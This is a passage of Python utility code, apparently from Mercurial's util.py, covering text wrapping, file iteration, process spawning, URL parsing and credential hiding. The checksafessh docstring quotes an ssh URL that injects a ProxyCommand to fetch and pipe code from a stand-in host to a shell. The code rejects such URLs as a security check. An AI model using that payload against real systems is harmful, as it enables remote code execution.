2379
2379
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy: round-trip through the local
        # encoding instead of failing outright
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2388
2388
def uirepr(s):
    """Return repr(s) with doubled backslashes collapsed to single ones.

    Avoids double backslash in Windows path repr().
    """
    rendered = repr(s)
    return rendered.replace('\\\\', '\\')
2392
2392
# delay import of textwrap
def MBTextWrapper(**kwargs):
    """Build (and cache) a column-width-aware TextWrapper subclass.

    On first call this defines the subclass, rebinds the module-level
    name MBTextWrapper to the class itself (so later calls skip the
    class-body re-execution), and returns an instance constructed with
    **kwargs.
    """
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Split ucstr so the head occupies at most space_left terminal
            # columns (per encoding.ucolwidth); returns (head, rest).
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            # At least one column must be available, even on a full line.
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                # Cannot break the word: put it on a line by itself.
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # Replace this factory function with the class so subsequent calls go
    # straight to the class constructor.
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2496
2496
def wrap(line, width, initindent='', hangindent=''):
    """Wrap a byte string to 'width' terminal columns and re-encode it.

    initindent prefixes the first output line, hangindent the rest.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    # decode/encode arguments using the configured local encoding
    enc = pycompat.sysstr(encoding.encoding)
    encmode = pycompat.sysstr(encoding.encodingmode)
    line = line.decode(enc, encmode)
    initindent = initindent.decode(enc, encmode)
    hangindent = hangindent.decode(enc, encmode)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(enc)
2512
2512
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #            | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            # Yield lines from fp, retrying raw os.read on EINTR; partial
            # trailing data (no final newline) is yielded at EOF.
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    # keepends=True so yielded lines retain their '\n',
                    # matching file.__iter__ behavior
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # incomplete last line: carry over to next read
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        """Iterate lines of fp, working around CPython 2's EINTR bug for
        "slow" streams (pipes, sockets, ttys); regular on-disk files take
        the fast path and are returned unchanged."""
        fastpath = True
        # only real py2 file objects can be fstat'd for S_ISREG; other
        # file-likes conservatively keep the fast path
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2584
2584
def iterlines(iterator):
    """Flatten an iterable of multi-line chunks into individual lines
    (line endings stripped)."""
    for block in iterator:
        for ln in block.splitlines():
            yield ln
2589
2589
def expandpath(path):
    """Expand environment variables and then ~user references in path."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2592
2592
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2607
2607
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # reap the child and record its (pid, status) so the poll loop
        # below can notice it died
        terminated.add(os.wait())
    prevhandler = None
    # SIGCHLD does not exist on all platforms (e.g. Windows); only install
    # the handler where it is available
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # condfn() is re-checked after detecting child death to close
            # the race where the child satisfied the condition and exited
            # between the two tests
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # always restore the previous SIGCHLD disposition
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2642
2642
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            # drop the leading regex-escape backslash to get the raw char
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # work on a copy: registering the escape entry must not mutate the
        # caller's mapping (previously this clobbered the argument in place)
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    r = remod.compile(r'%s(%s)' % (prefix, patterns))
    # x.group() includes the prefix character; strip it before lookup
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667
2667
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # not a number; treat it as a service name and fall through to
        # the system services database
        try:
            return socket.getservbyname(port)
        except socket.error:
            raise Abort(_("no port number associated with service '%s'")
                        % port)
2684
2684
# recognized boolean spellings, matched case-insensitively by parsebool()
_booleans = {word: value
             for value, words in ((True, ('1', 'yes', 'true', 'on',
                                          'always')),
                                  (False, ('0', 'no', 'false', 'off',
                                           'never')))
             for word in words}

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    return _booleans.get(s.lower())
2695
2695
# map every two-hex-digit string (all case combinations) to its character,
# e.g. 'ff', 'fF', 'Ff', 'FF' -> '\xff'
_hextochr = {a + b: chr(int(a + b, 16))
             for a in string.hexdigits for b in string.hexdigits}
2698
2698
2699 class url(object):
2699 class url(object):
2700 r"""Reliable URL parser.
2700 r"""Reliable URL parser.
2701
2701
2702 This parses URLs and provides attributes for the following
2702 This parses URLs and provides attributes for the following
2703 components:
2703 components:
2704
2704
2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2706
2706
2707 Missing components are set to None. The only exception is
2707 Missing components are set to None. The only exception is
2708 fragment, which is set to '' if present but empty.
2708 fragment, which is set to '' if present but empty.
2709
2709
2710 If parsefragment is False, fragment is included in query. If
2710 If parsefragment is False, fragment is included in query. If
2711 parsequery is False, query is included in path. If both are
2711 parsequery is False, query is included in path. If both are
2712 False, both fragment and query are included in path.
2712 False, both fragment and query are included in path.
2713
2713
2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2715
2715
2716 Note that for backward compatibility reasons, bundle URLs do not
2716 Note that for backward compatibility reasons, bundle URLs do not
2717 take host names. That means 'bundle://../' has a path of '../'.
2717 take host names. That means 'bundle://../' has a path of '../'.
2718
2718
2719 Examples:
2719 Examples:
2720
2720
2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2725 >>> url(b'file:///home/joe/repo')
2725 >>> url(b'file:///home/joe/repo')
2726 <url scheme: 'file', path: '/home/joe/repo'>
2726 <url scheme: 'file', path: '/home/joe/repo'>
2727 >>> url(b'file:///c:/temp/foo/')
2727 >>> url(b'file:///c:/temp/foo/')
2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2729 >>> url(b'bundle:foo')
2729 >>> url(b'bundle:foo')
2730 <url scheme: 'bundle', path: 'foo'>
2730 <url scheme: 'bundle', path: 'foo'>
2731 >>> url(b'bundle://../foo')
2731 >>> url(b'bundle://../foo')
2732 <url scheme: 'bundle', path: '../foo'>
2732 <url scheme: 'bundle', path: '../foo'>
2733 >>> url(br'c:\foo\bar')
2733 >>> url(br'c:\foo\bar')
2734 <url path: 'c:\\foo\\bar'>
2734 <url path: 'c:\\foo\\bar'>
2735 >>> url(br'\\blah\blah\blah')
2735 >>> url(br'\\blah\blah\blah')
2736 <url path: '\\\\blah\\blah\\blah'>
2736 <url path: '\\\\blah\\blah\\blah'>
2737 >>> url(br'\\blah\blah\blah#baz')
2737 >>> url(br'\\blah\blah\blah#baz')
2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2739 >>> url(br'file:///C:\users\me')
2739 >>> url(br'file:///C:\users\me')
2740 <url scheme: 'file', path: 'C:\\users\\me'>
2740 <url scheme: 'file', path: 'C:\\users\\me'>
2741
2741
2742 Authentication credentials:
2742 Authentication credentials:
2743
2743
2744 >>> url(b'ssh://joe:xyz@x/repo')
2744 >>> url(b'ssh://joe:xyz@x/repo')
2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2746 >>> url(b'ssh://joe@x/repo')
2746 >>> url(b'ssh://joe@x/repo')
2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2748
2748
2749 Query strings and fragments:
2749 Query strings and fragments:
2750
2750
2751 >>> url(b'http://host/a?b#c')
2751 >>> url(b'http://host/a?b#c')
2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2755
2755
2756 Empty path:
2756 Empty path:
2757
2757
2758 >>> url(b'')
2758 >>> url(b'')
2759 <url path: ''>
2759 <url path: ''>
2760 >>> url(b'#a')
2760 >>> url(b'#a')
2761 <url path: '', fragment: 'a'>
2761 <url path: '', fragment: 'a'>
2762 >>> url(b'http://host/')
2762 >>> url(b'http://host/')
2763 <url scheme: 'http', host: 'host', path: ''>
2763 <url scheme: 'http', host: 'host', path: ''>
2764 >>> url(b'http://host/#a')
2764 >>> url(b'http://host/#a')
2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2766
2766
2767 Only scheme:
2767 Only scheme:
2768
2768
2769 >>> url(b'http:')
2769 >>> url(b'http:')
2770 <url scheme: 'http'>
2770 <url scheme: 'http'>
2771 """
2771 """
2772
2772
2773 _safechars = "!~*'()+"
2773 _safechars = "!~*'()+"
2774 _safepchars = "/!~*'()+:\\"
2774 _safepchars = "/!~*'()+:\\"
2775 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2775 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2776
2776
2777 def __init__(self, path, parsequery=True, parsefragment=True):
2777 def __init__(self, path, parsequery=True, parsefragment=True):
2778 # We slowly chomp away at path until we have only the path left
2778 # We slowly chomp away at path until we have only the path left
2779 self.scheme = self.user = self.passwd = self.host = None
2779 self.scheme = self.user = self.passwd = self.host = None
2780 self.port = self.path = self.query = self.fragment = None
2780 self.port = self.path = self.query = self.fragment = None
2781 self._localpath = True
2781 self._localpath = True
2782 self._hostport = ''
2782 self._hostport = ''
2783 self._origpath = path
2783 self._origpath = path
2784
2784
2785 if parsefragment and '#' in path:
2785 if parsefragment and '#' in path:
2786 path, self.fragment = path.split('#', 1)
2786 path, self.fragment = path.split('#', 1)
2787
2787
2788 # special case for Windows drive letters and UNC paths
2788 # special case for Windows drive letters and UNC paths
2789 if hasdriveletter(path) or path.startswith('\\\\'):
2789 if hasdriveletter(path) or path.startswith('\\\\'):
2790 self.path = path
2790 self.path = path
2791 return
2791 return
2792
2792
2793 # For compatibility reasons, we can't handle bundle paths as
2793 # For compatibility reasons, we can't handle bundle paths as
2794 # normal URLS
2794 # normal URLS
2795 if path.startswith('bundle:'):
2795 if path.startswith('bundle:'):
2796 self.scheme = 'bundle'
2796 self.scheme = 'bundle'
2797 path = path[7:]
2797 path = path[7:]
2798 if path.startswith('//'):
2798 if path.startswith('//'):
2799 path = path[2:]
2799 path = path[2:]
2800 self.path = path
2800 self.path = path
2801 return
2801 return
2802
2802
2803 if self._matchscheme(path):
2803 if self._matchscheme(path):
2804 parts = path.split(':', 1)
2804 parts = path.split(':', 1)
2805 if parts[0]:
2805 if parts[0]:
2806 self.scheme, path = parts
2806 self.scheme, path = parts
2807 self._localpath = False
2807 self._localpath = False
2808
2808
2809 if not path:
2809 if not path:
2810 path = None
2810 path = None
2811 if self._localpath:
2811 if self._localpath:
2812 self.path = ''
2812 self.path = ''
2813 return
2813 return
2814 else:
2814 else:
2815 if self._localpath:
2815 if self._localpath:
2816 self.path = path
2816 self.path = path
2817 return
2817 return
2818
2818
2819 if parsequery and '?' in path:
2819 if parsequery and '?' in path:
2820 path, self.query = path.split('?', 1)
2820 path, self.query = path.split('?', 1)
2821 if not path:
2821 if not path:
2822 path = None
2822 path = None
2823 if not self.query:
2823 if not self.query:
2824 self.query = None
2824 self.query = None
2825
2825
2826 # // is required to specify a host/authority
2826 # // is required to specify a host/authority
2827 if path and path.startswith('//'):
2827 if path and path.startswith('//'):
2828 parts = path[2:].split('/', 1)
2828 parts = path[2:].split('/', 1)
2829 if len(parts) > 1:
2829 if len(parts) > 1:
2830 self.host, path = parts
2830 self.host, path = parts
2831 else:
2831 else:
2832 self.host = parts[0]
2832 self.host = parts[0]
2833 path = None
2833 path = None
2834 if not self.host:
2834 if not self.host:
2835 self.host = None
2835 self.host = None
2836 # path of file:///d is /d
2836 # path of file:///d is /d
2837 # path of file:///d:/ is d:/, not /d:/
2837 # path of file:///d:/ is d:/, not /d:/
2838 if path and not hasdriveletter(path):
2838 if path and not hasdriveletter(path):
2839 path = '/' + path
2839 path = '/' + path
2840
2840
2841 if self.host and '@' in self.host:
2841 if self.host and '@' in self.host:
2842 self.user, self.host = self.host.rsplit('@', 1)
2842 self.user, self.host = self.host.rsplit('@', 1)
2843 if ':' in self.user:
2843 if ':' in self.user:
2844 self.user, self.passwd = self.user.split(':', 1)
2844 self.user, self.passwd = self.user.split(':', 1)
2845 if not self.host:
2845 if not self.host:
2846 self.host = None
2846 self.host = None
2847
2847
2848 # Don't split on colons in IPv6 addresses without ports
2848 # Don't split on colons in IPv6 addresses without ports
2849 if (self.host and ':' in self.host and
2849 if (self.host and ':' in self.host and
2850 not (self.host.startswith('[') and self.host.endswith(']'))):
2850 not (self.host.startswith('[') and self.host.endswith(']'))):
2851 self._hostport = self.host
2851 self._hostport = self.host
2852 self.host, self.port = self.host.rsplit(':', 1)
2852 self.host, self.port = self.host.rsplit(':', 1)
2853 if not self.host:
2853 if not self.host:
2854 self.host = None
2854 self.host = None
2855
2855
2856 if (self.host and self.scheme == 'file' and
2856 if (self.host and self.scheme == 'file' and
2857 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2857 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2858 raise Abort(_('file:// URLs can only refer to localhost'))
2858 raise Abort(_('file:// URLs can only refer to localhost'))
2859
2859
2860 self.path = path
2860 self.path = path
2861
2861
2862 # leave the query string escaped
2862 # leave the query string escaped
2863 for a in ('user', 'passwd', 'host', 'port',
2863 for a in ('user', 'passwd', 'host', 'port',
2864 'path', 'fragment'):
2864 'path', 'fragment'):
2865 v = getattr(self, a)
2865 v = getattr(self, a)
2866 if v is not None:
2866 if v is not None:
2867 setattr(self, a, urlreq.unquote(v))
2867 setattr(self, a, urlreq.unquote(v))
2868
2868
2869 @encoding.strmethod
2869 @encoding.strmethod
2870 def __repr__(self):
2870 def __repr__(self):
2871 attrs = []
2871 attrs = []
2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2873 'query', 'fragment'):
2873 'query', 'fragment'):
2874 v = getattr(self, a)
2874 v = getattr(self, a)
2875 if v is not None:
2875 if v is not None:
2876 attrs.append('%s: %r' % (a, v))
2876 attrs.append('%s: %r' % (a, v))
2877 return '<url %s>' % ', '.join(attrs)
2877 return '<url %s>' % ', '.join(attrs)
2878
2878
    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        # Plain local paths (and bundle: paths) round-trip with no quoting.
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            # scheme-only / absolute-path forms still get the '//' separator
            # (see the file:/// and localhost doctests above).
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                # bracketed IPv6 literals keep their brackets and colons as-is
                s += self.host
            if self.port:
                s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s
2955
2955
    # str() delegates to __bytes__ via the same encoding.strmethod wrapper
    # used for __repr__ above.
    __str__ = encoding.strmethod(__bytes__)
2957
2957
2958 def authinfo(self):
2958 def authinfo(self):
2959 user, passwd = self.user, self.passwd
2959 user, passwd = self.user, self.passwd
2960 try:
2960 try:
2961 self.user, self.passwd = None, None
2961 self.user, self.passwd = None, None
2962 s = bytes(self)
2962 s = bytes(self)
2963 finally:
2963 finally:
2964 self.user, self.passwd = user, passwd
2964 self.user, self.passwd = user, passwd
2965 if not self.user:
2965 if not self.user:
2966 return (s, None)
2966 return (s, None)
2967 # authinfo[1] is passed to urllib2 password manager, and its
2967 # authinfo[1] is passed to urllib2 password manager, and its
2968 # URIs must not contain credentials. The host is passed in the
2968 # URIs must not contain credentials. The host is passed in the
2969 # URIs list because Python < 2.4.3 uses only that to search for
2969 # URIs list because Python < 2.4.3 uses only that to search for
2970 # a password.
2970 # a password.
2971 return (s, (None, (s, self.host),
2971 return (s, (None, (s, self.host),
2972 self.user, self.passwd or ''))
2972 self.user, self.passwd or ''))
2973
2973
2974 def isabs(self):
2974 def isabs(self):
2975 if self.scheme and self.scheme != 'file':
2975 if self.scheme and self.scheme != 'file':
2976 return True # remote URL
2976 return True # remote URL
2977 if hasdriveletter(self.path):
2977 if hasdriveletter(self.path):
2978 return True # absolute for our purposes - can't be joined()
2978 return True # absolute for our purposes - can't be joined()
2979 if self.path.startswith(br'\\'):
2979 if self.path.startswith(br'\\'):
2980 return True # Windows UNC path
2980 return True # Windows UNC path
2981 if self.path.startswith('/'):
2981 if self.path.startswith('/'):
2982 return True # POSIX-style
2982 return True # POSIX-style
2983 return False
2983 return False
2984
2984
    def localpath(self):
        """Return a local filesystem path for file:/bundle: URLs.

        Any other URL is returned exactly as it was originally given.
        """
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                # a host component consumed the leading slash during
                # parsing; put it back so the path stays absolute
                path = '/' + path
            return path
        return self._origpath
2997
2997
2998 def islocal(self):
2998 def islocal(self):
2999 '''whether localpath will return something that posixfile can open'''
2999 '''whether localpath will return something that posixfile can open'''
3000 return (not self.scheme or self.scheme == 'file'
3000 return (not self.scheme or self.scheme == 'file'
3001 or self.scheme == 'bundle')
3001 or self.scheme == 'bundle')
3002
3002
def hasscheme(path):
    """Report whether *path* parses with a URL scheme prefix."""
    parsed = url(path)
    return bool(parsed.scheme)
3005
3005
def hasdriveletter(path):
    """Report whether *path* starts with a Windows drive letter ('c:'...).

    An empty/falsy *path* is returned unchanged (falsy), matching the
    short-circuit behavior of the original expression form.
    """
    if not path:
        return path
    return path[1:2] == ':' and path[0:1].isalpha()
3008
3008
def urllocalpath(path):
    """Parse *path* (ignoring query/fragment) and return its local path."""
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3011
3011
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    # unquote first so %2D etc. cannot smuggle a leading dash past the check
    path = urlreq.unquote(path)
    unsafeprefixes = ('ssh://-', 'svn+ssh://-')
    if path.startswith(unsafeprefixes):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (path,))
3026
3026
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
3033
3033
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # Return bytes, matching hidepassword() above; str(u) would yield a
    # unicode-repr of the bytes form on Python 3 instead of the URL itself.
    return bytes(u)
3039
3039
# Human-readable formatter for durations given in seconds, used by timed()
# below.  Built via unitcountfn from rows that appear to be
# (factor, divisor, format) triples ordered from largest unit (s) down to
# ns, with precision growing as magnitudes shrink.
# NOTE(review): exact row semantics depend on unitcountfn (defined earlier
# in this file) — confirm before relying on them.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
3055
3055
# Current indentation (in spaces) for nested @timed reports; a one-element
# list so wrappers can mutate the shared counter in place.
_timenesting = [0]
3057
3057
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''
    indent = 2

    def wrapper(*args, **kwargs):
        # bump the shared nesting level so nested @timed calls indent
        _timenesting[0] += indent
        start = timer()
        try:
            return func(*args, **kwargs)
        finally:
            elapsed = timer() - start
            _timenesting[0] -= indent
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))

    return wrapper
3082
3082
# Size-suffix table: single letters first, two-letter forms after, bare 'b'
# last so that e.g. 'kb' is matched before the trailing 'b' would be.
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
